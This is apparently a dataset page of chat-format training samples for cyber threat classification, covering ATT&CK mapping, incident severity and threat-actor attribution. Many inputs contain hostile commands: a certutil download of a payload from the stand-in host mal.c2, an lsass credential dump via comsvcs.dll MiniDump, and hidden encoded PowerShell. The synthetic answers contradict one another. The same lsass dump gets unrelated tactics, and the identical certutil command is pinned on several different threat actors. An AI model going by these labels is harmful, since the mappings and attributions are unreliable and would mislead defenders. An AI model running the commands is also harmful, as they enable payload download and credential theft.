messages listlengths 2 2 |
|---|
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552.004\", \"T1552\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3685 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.151.174.185",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniqu... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-BJAEL5OO0Q)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Execution",
"role": "user"
},
{
"content":... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic (DNS).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code.",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-Y2UXQ6GHP3)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement, Privilege Escalation",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-VPBWX520PZ)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Collection",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: This can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority.",
"role": "user"
},
{
"content": "{\"ta... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.13.127.143",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0007\"], \"techn... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for newly executed processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.",
"role": "user"
},
{
"content": "{\"tacti... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BLINDINGCAN has used Rundll32 to load a malicious DLL.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.011\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: NotPetya searches for files ending with dozens of different file extensions prior to encryption.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "a... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-3F32HJP2HV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Extrem... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2996 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.187.187.175",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Filter or block WebDAV protocol traffic from exiting the network.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1187\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 958 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor executed processes and command-line arguments for actions that could be taken to gather local email files.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1114\"]... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3550 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.66.43.146",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Agent Tesla has used HTTP for C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-5YBOVPHBJN)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\": \"Cri... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.80.57.121",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.156.66.132",
"role": "user"
},
{
"content": "{\"tactics\": [\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-0P4YDUOCR8)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.77.238.245",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-9QCZT4GJXP)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Impact, Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor executed commands and arguments acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2937 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.180.124.63",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA001... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.175.131.178",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA004... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.",
"role": "u... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: An APT3 downloader establishes SOCKS5 connections for its initial C2.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090\", \"T1090.002\", \"T1095\"]}",
"role": "as... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"tec... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.13.213.233",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0009\", \"TA0001\"], \"t... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-NFZV75ES8Z)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Impact",
"role": "user"
},
{
"content... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Where possible, the ability to request temporary account tokens on behalf of another accounts should be disabled.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0008\"], \"techniques\": [\"T15... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidence\": \... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: nltest /domain_trusts",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX.",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2762 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.143.59.60",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techn... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor file access on removable media that may attempt to exfiltrate data via a physical medium, such as a removable drive.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T105... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-WBSW8OIKBV)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1580 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.131.107.15",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-903IZ9AGQ7)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"Extrem... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.61.183.176",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"tech... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3479 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.18.4.199",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniq... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: EvilGrab has the capability to capture screenshots.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.38.137.109",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.48.240.101",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0007\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.115.192.58",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0001\"], \"techniques\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.22.2.62",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0004\"], \"techniques\": [\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-DV22O07EFE)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"E... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-J6CILDYWI0)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"Extre... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-OFSZGNQBIZ)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Persistence, Reconnaissance",
"role": "user"
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.189.161.142",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0010\"], \"techn... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-9E3ZWS5KPN)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Persistence",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Pupy can walk through directories and recursively search for strings in files.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not requi... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kimsuky has renamed malware to legitimate names such as ESTCommon.dll or patch.dll.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.005\", \"T1036\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: PoetRAT used voStro.exe, a compiled pypykatz (Python version of Mimikatz), to steal credentials.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.001\"]}",
"role": "assis... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2325 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.161.51.84",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\",... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.",
"role": "user... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2608 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"confide... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: nltest /domain_trusts",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: nltest /domain_trusts",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-H9WE0A9M36)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Command and Control, Exfiltration",
"role": "user"
},... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-A3BVA6TTOA)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.135.103.241",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0009\", \"TA0043\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-SMSVMSCNSW)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"High\", \... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Operation Wocao has gathered a recursive directory listing to find files and directories of interest.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assistant"
}
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request’s cookie in the PHPSESSID field, as seen in the example GET request... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-533D9D31UZ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"co... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2777 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.58.220.202",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\",... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.003\", \"T1562\"]}"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.139.154.196",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-RJ8RCMEITA)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Execution",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.88.232.207",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"technique... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confi... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: SMOKEDHAM has been delivered via malicious links in phishing emails.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1598\", \"T1598.003\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.117.157.212",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0006\", \"TA000... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for newly constructed files on removable media",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0008\"], \"techniques\": [\"T1091\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: APT1 used the ipconfig /all command to gather network configuration information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}",
"role": "assistant"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.